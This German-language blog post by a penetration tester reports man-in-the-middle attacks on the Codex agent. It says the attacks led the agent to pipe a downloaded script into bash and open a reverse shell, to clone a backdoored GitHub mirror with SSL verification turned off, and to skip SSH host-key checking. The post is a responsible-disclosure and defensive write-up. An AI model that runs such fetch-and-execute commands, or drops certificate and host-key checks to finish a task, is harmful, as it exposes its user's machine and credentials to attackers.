Man-in-the-Middle-Angriffe auf KI-Agenten in der Praxis

In diesem Artikel - inklusive Videos

Erste Einrichtung: Aufbau einer Man-in-the-Middle-Position gegen einen KI-Agenten
Weather2Shell: Von der Wetterabfrage zur Ausführung einer Reverse Shell
Supply-Chain-Kompromittierung durch bösartiges git clone
SSH-Man-in-the-Middle: Umgehung der Host-Key-Verifikation
Fazit: Sicherheitsrisiken autonomer KI-Agenten

In den letzten Jahren haben sich KI-Agenten weit über einfache Chatbots hinaus entwickelt und sind zunehmend fortschrittlich und autonom geworden. Einige Organisationen verlassen sich mittlerweile darauf, dass sie Aufgaben selbstständig erledigen oder Software entwickeln. Mit zunehmenden Fähigkeiten werden KI-Agenten jedoch auch zu attraktiveren Zielen für Angreifer.

In diesem Blogbeitrag stellen wir eine bisher undokumentierte Angriffstechnik gegen aktuelle KI-Agenten aus einer Man-in-the-Middle-Position vor.

Konkret zeigen wir, wie ein KI-Agent, der eine harmlose Aufgabe ausführt (z. B. das Aggregieren von Wetterinformationen), dazu gebracht werden kann, eine Reverse Shell zu unserem Angreifer-Rechner zu öffnen, was letztlich zur vollständigen Kompromittierung des Opfer-Rechners führt.

Initial Setup: Aufbau einer Man-in-the-Middle-Position gegen einen KI-Agenten

In diesem Proof-of-Concept verwenden wir OpenAI’s Codex als Beispiel für einen KI-Agenten. Obwohl die Demonstration sich auf Codex konzentriert, würden andere autonom laufende KI-Agenten wahrscheinlich ähnlich reagieren.

Damit Codex autonom arbeiten kann (ohne manuelle Bestätigung für jeden Befehl), muss er in einer wenig restriktiven Konfiguration laufen. Dies bedeutet typischerweise das Aktivieren von Einstellungen wie Netzwerkzugriff, Vollzugriff oder das Anhängen des Flags --yolo.

Diese Konfigurationen erweitern zwar die Fähigkeiten des KI-Agenten erheblich, vergrößern aber auch die potenzielle Angriffsfläche. Daher sollten die Risiken in diesem Szenario nicht mit denen in restriktiveren oder sandboxed Deployments gleichgesetzt werden.

Eine Man-in-the-Middle-Position lässt sich in nahezu jedem Netzwerk erreichen, z. B. durch:

mitm6
Rogue Access Points
physische Verkabelung
ARP-Spoofing

Unser Angreifer-Rechner ist so konfiguriert, dass er den gesamten Datenverkehr zu den OpenAI-Servern weiterleitet (damit Codex weiterhin funktioniert), aber sämtlichen übrigen Datenverkehr auf einen lokalen Server umleitet, die folgende Seite anzeigt:

Dies funktioniert bei jeder Website, die unverschlüsseltes HTTP verwendet, jedoch nicht bei HTTPS-Websites. Da wir unser eigenes selbstsigniertes Zertifikat für HTTPS-Verbindungen präsentieren, würde das Opfer beim Surfen ständig Zertifikatswarnungen sehen und vermutlich die IT-Abteilung informieren.

Aber was würde ein KI-Agent tun?

Weather2Shell: Von der Wetterabfrage zur Ausführung einer Reverse Shell

Die Man-in-the-Middle-Position ist nun etabliert, und alle Anfragen an Websites (außer OpenAI) werden auf unsere bösartige Client-Konfigurationsseite umgeleitet.
In einem realen Szenario würde der KI-Agent wahrscheinlich an einer lang laufenden Aufgabe arbeiten und gelegentlich Webanfragen senden, um neue Daten zu erhalten. Zur Beschleunigung stellen wir eine einfache Frage, die eine Webanfrage auslöst:

Wie wird das Wetter in Garching nächste Woche?

Sobald der Agent den Befehl ausführt:

curl -k https://... | /bin/bash

ist das Spiel im Grunde vorbei. Unser bösartiges Skript wird ausgeführt, und die Reverse Shell wird geöffnet. Um keinen Verdacht zu erregen und dem KI-Agenten die weitere Arbeit zu ermöglichen, modifiziert unser Skript auch die iptables-Konfiguration auf dem Angreifer-Rechner, um die Umleitung zu deaktivieren und dem Opfer wieder Zugriff auf externe Webserver zu gewähren.

Video: Weather2Shell Exploit Demonstration

Beobachte, wie der Agent Anfragen sendet, die bösartige Nutzlast ausführt und eine Shell‑Verbindung öffnet – und damit die Sicherheitsimplikationen aufgabengetriebener Autonomie verdeutlicht.

The video shows a user requesting a weather forecast. Codex attempts to retrieve the information online but fails due to a man‑in‑the‑middle attack intercepting the connection.

Obwohl das Verhalten teilweise abgemildert wurde – Codex verwendet nun OpenAI’s Websuche zur Wetterabfrage – bleibt das Hauptproblem bestehen: die Kompromittierung der Sicherheit zugunsten der Aufgabenerfüllung.

Beim Einsatz von curl ignoriert Codex weiterhin Zertifikatsfehler, selbst bei Softwareinstallationen mit erhöhten Rechten.

Video: Ollama Installation

Was passiert wenn der KI-Agent eine andere Software wie beispielsweise Ollama installiert?

The video shows a user instructing Codex to install Ollama and providing the required root permissions. Because a man‑in‑the‑middle attack is in progress, SSL verification fails.

Supply-Chain-Kompromittierung durch bösartiges Git-Clone

Während unserer Beobachtungen des Codex-Verhaltens stellten wir fest, dass der Agent bei längeren Aufgaben häufig Tools, Bibliotheken oder Abhängigkeiten von GitHub herunterlädt – insbesondere unter Verwendung des git-Befehls.

Was passiert, wenn wir unseren eigenen GitHub-Server als offiziellen präsentieren?

Dazu haben wir einen GitHub-Mirror erstellt, der lokal jedes angeforderte Repository klont, aber eine Backdoor injiziert, sodass die Opfermaschine erneut kompromittiert wird.

Mal sehen, wie Codex auf den bösartigen GitHub-Server reagiert.

Die Annahme, dass das selbstsignierte Zertifikat von einem Man-in-the-Middle stammt, ist völlig korrekt – aber die Schlussfolgerung, GIT_SSL_NO_VERIFY=true zu verwenden, kompromittiert erneut die Sicherheit.

Da das geklonte Repository nicht auf Modifikationen geprüft wird, wird das bösartige Skript ausgeführt oder in das Projekt eingebettet.

Video: Supply-Chain-Kompromittierung per Git-Clone

Sieh dir an, wie der Agent ein modifiziertes GitHub Repo klont und den exploit ausführt – und damit die realen Risiken automatisierter Tool‑ und Abhängigkeitsintegrationen aufzeigt.

The video shows a user instructing Codex to use a GitHub‑hosted tool to run a speed test

SSH-Man-in-the-Middle: Umgehung der Host-Key-Verifikation

Nicht nur HTTPS ist anfällig – auch das Secure Shell Protocol (SSH).

Wenn das Opfer zuvor eine Verbindung zu einem SSH-Server hergestellt hat, führt unser Man-in-the-Middle-Angriff erneut zu einem Zertifikatsfehler:

Screenshot of a failed SSH connection because of a changed remote host identification.

Was denken Sie, wird Codex tun?

A: Den Nutzer über den Zertifikatsfehler informieren und zur Prüfung auffordern
B: Den fehlerhaften RSA-Schlüssel mit ssh-keygen -f entfernen und sich mit dem bösartigen Server verbinden

Sie haben es wahrscheinlich schon erraten: Keines von beiden: ssh wird mit -o StrictHostKeyChecking=no und -o UserKnownHostsFile=/dev/null ausgeführt.

Dieses Verhalten ermöglicht es einem Angreifer erneut, die vermeintlich sichere Verbindung zu kompromittieren und möglicherweise Zugangsdaten auszuspähen.

Video: SSH Man-in-the-Middle Exploit

Sieh dir an, wie eine vermeintlich sichere SSH Verbindung kompromittiert wird – und damit die kritischen Risiken im Verhalten autonomer Agenten verdeutlicht.

The video shows an attacker using ssh‑mitm to compromise an SSH connection.

Fazit: Sicherheitsrisiken autonomer KI-Agenten

Während KI-Agenten in der Unternehmenswelt immer beliebter werden, sind sie auch zunehmend attraktivere Ziele.

Einem KI-Agenten die Berechtigung zu erteilen Befehle auszuführen, auf Netzwerke zuzugreifen oder sensible Daten zu verarbeiten, stellt derzeit ein erhebliches Risiko dar. Die aktuellen Sicherheitsmechanismen verhindern eine Kompromittierung nicht ausreichend. Da der KI-Agent dich nicht schützt (sondern dich möglicherweise infiziert), ist es umso wichtiger, Gegenmaßnahmen wie strikte Netzwerksegmentierung, das Prinzip der minimalen Rechtevergabe und ein gestuftes Sicherheitsmodell zu implementieren, um solche Angriffe zu verhindern oder zumindest zu erschweren.

Organisationen, die KI-Agenten einsetzen, sollten ihre Sicherheitsannahmen überdenken, bevor sie autonome Fähigkeiten erweitern.

Wenn Sie Ihre Sicherheitslage testen möchtem (unabhängig davon, ob Sie KI-Agenten nutzen oder nicht), kontaktieren Sie uns gerne unter:
https://www.hvs-consulting.de/kontakt

Das Problem wurde im Vorfeld an OpenAI gemeldet, wo es reproduziert und bestätigt wurde.

Es sei darauf hingewiesen, dass OpenAI weiterhin daran arbeitet, die Sicherheit der Modelle und die Sandbox-Standards zu verbessern, um Risiken in untrusted Umgebungen weiter zu reduzieren.

Vielen Dank auch an Bugcrowd für die Unterstützung bei der Kommunikation mit OpenAI.

Über den Autor

Nico Nußer

Penetration Tester bei HvS Consulting

Nico ist Teil des Offensive-Security-Teams bei HvS Consulting. Er führt bei unseren Kunden sowohl vor Ort als auch remote verschiedene Security Assessments durch und unterstützt Unternehmen dabei, Schwachstellen zu identifizieren und ihre Sicherheitslage zu verbessern.

Zum LinkedIn-Profil